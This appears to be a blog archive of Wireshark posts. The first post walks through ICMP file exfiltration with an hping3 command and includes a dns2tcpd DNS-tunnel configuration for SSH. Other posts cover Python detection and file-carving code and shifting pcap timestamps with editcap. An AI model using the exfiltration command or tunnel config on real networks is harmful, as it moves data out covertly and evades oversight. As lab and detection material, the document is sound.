Category archive: Wireshark

Data exfiltration over ICMP

hping3 on Kali Linux

-E <file>  file whose contents are placed in the packet data
-1         use ICMP (echo request) mode
-u         report when --file reaches EOF and do not rewind to the start of the file
-i 10      send one packet every 10 seconds (slow)
-d 95      data size in bytes (the output confirms "95 data bytes"); the destination IP is the final argument

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95 192.168.20.106
HPING 192.168.20.106 (eth0 192.168.20.106): icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
len=123 ip=192.168.20.106 ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip=192.168.20.106 ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip=192.168.20.106 ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip=192.168.20.106 ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

Data in the sent file "dns2tcp.txt":

root@kali:~# cat dns2tcp.txt
Kali

cat dns2tcpdrc

listen = 192.168.20.243
port = 53
user = nobody
chroot = /tmp/
domain = ns01.rootsecurity.info
resources = ssh:127.0.0.1:22
dns2tcpd -F -d 3 -f /dns2tcpdrc


Monitor on the receiving end using Wireshark

[Screenshot: icmp-1]

ICMP display filter

[Screenshot: icmp-2]

The first session contains the first part of the original file

[Screenshot: icmp-3]

The second session contains the rest of the file, and so on.
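What the Wireshark screenshots show by hand (echo-request data ordered by sequence number, one "session" per ICMP id) can be done programmatically, which is how a defender would hunt for this in a capture. The following is an added example, not code from the post or from hping3: it parses raw IPv4/ICMP bytes, reassembles payloads per (src, dst, id), and flags sessions whose data does not look like the stock payload of Windows or Linux ping. The sample packets and the "secret" file content are constructed inline; the ping-payload heuristic is an assumption of this example.

```python
import struct
from collections import defaultdict

# Stock payloads of common ping tools (assumption used by the heuristic below):
# Windows ping sends this fixed 32-byte string; Linux iputils ping sends an
# 8-byte timestamp followed by the byte sequence 0x10, 0x11, 0x12, ...
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"


def _checksum(data):
    """RFC 1071 one's-complement checksum, used only to build the sample packets."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(src, dst, ident, seq, payload):
    """Build a raw IPv4 + ICMP echo request (constructed test input only)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    icmp = struct.pack("!BBHHH", 8, 0, _checksum(icmp), ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x1234, 0, 64, 1, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return ip + icmp


def parse_icmp_echo(packet):
    """Return (src, dst, id, seq, payload) for an IPv4 ICMP echo request, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1 or len(packet) < ihl + 8:      # IP protocol 1 = ICMP
        return None
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[ihl:ihl + 8])
    if icmp_type != 8:                               # 8 = echo request
        return None
    return src, dst, ident, seq, packet[ihl + 8:]


def looks_like_standard_ping(payload):
    """True if the payload matches what Windows or Linux ping normally sends."""
    if payload == WINDOWS_PING:
        return True
    if len(payload) >= 16:
        expected = bytes((0x10 + i) & 0xFF for i in range(len(payload) - 8))
        return payload[8:] == expected
    return False


def reassemble_icmp_sessions(packets):
    """Group echo-request payloads by (src, dst, id) and order them by sequence number."""
    sessions = defaultdict(dict)
    for pkt in packets:
        parsed = parse_icmp_echo(pkt)
        if parsed is None:
            continue
        src, dst, ident, seq, payload = parsed
        sessions[(src, dst, ident)][seq] = payload
    return {key: [chunks[s] for s in sorted(chunks)] for key, chunks in sessions.items()}


def find_suspicious_icmp(packets):
    """Return {(src, dst, id): reassembled bytes} for sessions carrying non-stock payloads."""
    flagged = {}
    for key, chunks in reassemble_icmp_sessions(packets).items():
        if not all(looks_like_standard_ping(c) for c in chunks):
            flagged[key] = b"".join(chunks)
    return flagged


# Constructed sample traffic: a small "file" carried in 16-byte slices, the way
# hping3 -1 -E slices a file into echo-request data, plus two benign pings.
SECRET = b"listen = 192.168.20.243\nport = 53\n"


def sample_packets():
    chunk = 16
    pkts = [build_icmp_echo("192.168.20.5", "192.168.20.106", 0x1A2B, i,
                            SECRET[i * chunk:(i + 1) * chunk])
            for i in range((len(SECRET) + chunk - 1) // chunk)]
    pkts.append(build_icmp_echo("192.168.20.7", "192.168.20.106", 1, 5, WINDOWS_PING))
    linux_payload = b"\x00" * 8 + bytes(0x10 + i for i in range(48))
    pkts.append(build_icmp_echo("192.168.20.8", "192.168.20.106", 2, 1, linux_payload))
    return pkts


if __name__ == "__main__":
    for (src, dst, ident), data in find_suspicious_icmp(sample_packets()).items():
        print(f"{src} -> {dst} id={ident:#x}: {len(data)} bytes reassembled")
        print(data.decode("latin-1"))
```

The same grouping key (ICMP id) is what separates the "first session" and "second session" in the screenshots; in a real capture you would feed the raw IP packets from the pcap into find_suspicious_icmp and review every session it returns.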

How to extract files from network traffic using Wireshark

1. Install Wireshark and start capturing network traffic
2. Download a .exe file, which in this example is putty.exe
3. When the file has been downloaded to your machine, stop the capture
4. Search for and identify the session related to the download activity (hint: look for HTTP GET requests)

[Screenshot: wireshark-1]


5. Right-click the session and select Follow Stream
6. Instead of selecting the entire conversation, select only the traffic originating from the web server, in this case 46.43.34.31:80 -> 192.168.178.34:64491

[Screenshot: wireshark-2]

7. Click Save as and save it as, for example, dump

8. Now open the dump file in your favourite hex editor and remove the HTTP header, which in the screenshot below is the red part:

[Screenshot: wireshark-3]

9. After you have removed the HTTP header, your file should start with MZ

[Screenshot: wireshark-4]

10. Save the file as dump.exe

[Screenshot: wireshark-5]

11. See the result: you have now obtained the .exe from the network traffic

[Screenshot: wireshark-6]
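Steps 7 to 10 above strip the HTTP framing by hand in a hex editor. As an added example (not code from the post or from Wireshark), the script below does the same to a saved server-to-client stream: it locates the blank line that ends the header, keeps exactly Content-Length bytes (or decodes chunked transfer encoding), and checks the leading magic bytes so a truncated or mis-cut file is noticed before it is trusted as "the exe". The sample stream is constructed inline and stands in for the putty.exe download; the file name dump.exe and the magic-byte table are assumptions of this example.

```python
import sys

# Leading bytes of a few file types commonly carved from HTTP streams (assumption).
MAGIC = {
    b"MZ": "PE/DOS executable",
    b"\x7fELF": "ELF executable",
    b"\x89PNG": "PNG image",
    b"%PDF": "PDF document",
    b"PK\x03\x04": "ZIP archive (also docx/jar/apk)",
}


def split_http_response(stream):
    """Split a raw HTTP response into (status line, header dict, body bytes)."""
    sep = stream.find(b"\r\n\r\n")
    if sep < 0:
        raise ValueError("end of HTTP header (blank line) not found")
    head = stream[:sep].decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return head[0], headers, stream[sep + 4:]


def dechunk(body):
    """Decode a Transfer-Encoding: chunked body (hex size line, data, CRLF, ..., 0)."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("malformed chunked body")
        size = int(body[pos:eol].split(b";")[0], 16)
        if size == 0:
            return bytes(out)
        out += body[eol + 2:eol + 2 + size]
        pos = eol + 2 + size + 2


def extract_body(stream):
    """Return exactly the response body, honouring Content-Length or chunked framing."""
    _status, headers, body = split_http_response(stream)
    if "content-length" in headers:
        length = int(headers["content-length"])
        if len(body) < length:
            raise ValueError(f"truncated download: {len(body)} of {length} bytes present")
        return body[:length]
    if headers.get("transfer-encoding", "").lower() == "chunked":
        return dechunk(body)
    return body


def file_kind(data):
    """Identify the carved file from its leading magic bytes."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def carve(stream, out_path=None):
    """Strip HTTP framing from a saved server-side stream; optionally write the file."""
    body = extract_body(stream)
    if out_path:
        with open(out_path, "wb") as fh:
            fh.write(body)
    return body, file_kind(body)


# Constructed stand-in for the saved "dump" stream: a real PE starts the same way,
# but this body is just an MZ header followed by filler, not putty.exe.
SAMPLE_BODY = b"MZ" + b"\x90\x00" * 29 + b"PE\x00\x00" + b"\x00" * 40
SAMPLE_STREAM = (b"HTTP/1.1 200 OK\r\n"
                 b"Server: Apache\r\n"
                 b"Content-Type: application/octet-stream\r\n"
                 b"Content-Length: %d\r\n\r\n" % len(SAMPLE_BODY)) + SAMPLE_BODY

if __name__ == "__main__":
    # usage: python carve.py dump   (writes dump.exe); with no argument the sample is used
    path = sys.argv[1] if len(sys.argv) > 1 else None
    stream = open(path, "rb").read() if path else SAMPLE_STREAM
    body, kind = carve(stream, "dump.exe" if path else None)
    print(f"{len(body)} bytes of body, magic says: {kind}")
```

Keeping only Content-Length bytes matters when the saved stream holds more than one response on the same connection; the magic check is the programmatic version of "the file should start with MZ".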

How to change the timestamp of pcap files

Sometimes you need to change the timestamps of a previously recorded PCAP file. To do so, follow the steps below:

1. Download and install Wireshark

2. Check the current timestamp of your pcap file. In my case this was the following:

[Screenshot: pcap]

3. Browse to http://www.timeanddate.com/ to calculate the time difference in seconds between the recorded time and the current time.

In this case this was the following:

[Screenshot: time]

4. Run Wireshark's editcap.exe to create a new PCAP file with the timestamps shifted to the current date:

c:\Program Files (x86)\Wireshark>editcap.exe -t 83585803 -F pcap Lab5.pcap x:\TEST3.pcap

5. Open the new PCAP file in Wireshark to confirm the change in date and time

[Screenshot: Time-New]
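To make clear what editcap -t does to the file, here is an added example (not code from the post or from the Wireshark project) that performs the same shift on a classic pcap: it reads the 24-byte global header, walks each 16-byte record header, adds the offset to the seconds field and leaves everything else byte-for-byte intact. It also computes the offset the timeanddate.com step produces, i.e. the difference between "now" and the first packet. The sample pcap with two dummy frames is constructed inline; pcapng is not handled, which is an assumption of this example.

```python
import struct
import time

PCAP_MAGICS = (0xA1B2C3D4, 0xA1B23C4D)  # classic pcap, microsecond and nanosecond variants


def _endian(data):
    """Detect the byte order of a classic pcap file from its magic number."""
    for prefix in ("<", ">"):
        if struct.unpack(prefix + "I", data[:4])[0] in PCAP_MAGICS:
            return prefix
    raise ValueError("not a classic pcap file (pcapng is not handled here)")


def packet_records(data):
    """Yield (offset, ts_sec, ts_frac, incl_len) for every packet record in the file."""
    endian = _endian(data)
    pos = 24
    while pos + 16 <= len(data):
        ts_sec, ts_frac, incl_len, _orig_len = struct.unpack(endian + "IIII", data[pos:pos + 16])
        yield pos, ts_sec, ts_frac, incl_len
        pos += 16 + incl_len


def packet_timestamps(data):
    """Whole-second timestamps of all packets, in file order."""
    return [ts for _pos, ts, _frac, _len in packet_records(data)]


def offset_to_now(data, now=None):
    """Seconds to add so the first packet lands at 'now' (the value the timeanddate step yields)."""
    first = packet_timestamps(data)[0]
    return int(time.time() if now is None else now) - first


def shift_pcap_timestamps(data, offset_seconds):
    """Return a copy of the pcap with every record's timestamp moved by offset_seconds."""
    endian = _endian(data)
    out = bytearray(data[:24])                      # global header is copied unchanged
    for pos, ts_sec, ts_frac, incl_len in packet_records(data):
        new_sec = ts_sec + offset_seconds
        if not 0 <= new_sec <= 0xFFFFFFFF:
            raise ValueError(f"timestamp {ts_sec} + {offset_seconds} leaves the 32-bit range")
        out += struct.pack(endian + "II", new_sec, ts_frac)
        out += data[pos + 8:pos + 16 + incl_len]    # length fields and frame bytes unchanged
    return bytes(out)


def build_sample_pcap(timestamps):
    """Constructed little-endian pcap with one dummy Ethernet frame per timestamp."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    body = b""
    for i, ts in enumerate(timestamps):
        frame = b"\x00" * 14 + bytes([i])
        body += struct.pack("<IIII", int(ts), int((ts % 1) * 1_000_000),
                            len(frame), len(frame)) + frame
    return header + body


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # usage: python shift.py Lab5.pcap TEST3.pcap  (shifts the capture to start now)
        src, dst = sys.argv[1:3]
        data = open(src, "rb").read()
        delta = offset_to_now(data)
        open(dst, "wb").write(shift_pcap_timestamps(data, delta))
        print(f"shifted {len(packet_timestamps(data))} packets by {delta} seconds -> {dst}")
    else:
        original = build_sample_pcap([1200000000, 1200000005.5])
        shifted = shift_pcap_timestamps(original, 83585803)
        print(packet_timestamps(original), "->", packet_timestamps(shifted))
```

Because only the seconds field of each record changes, packet order, lengths and inter-packet gaps are preserved, which is why the shifted file still replays and dissects exactly like the original.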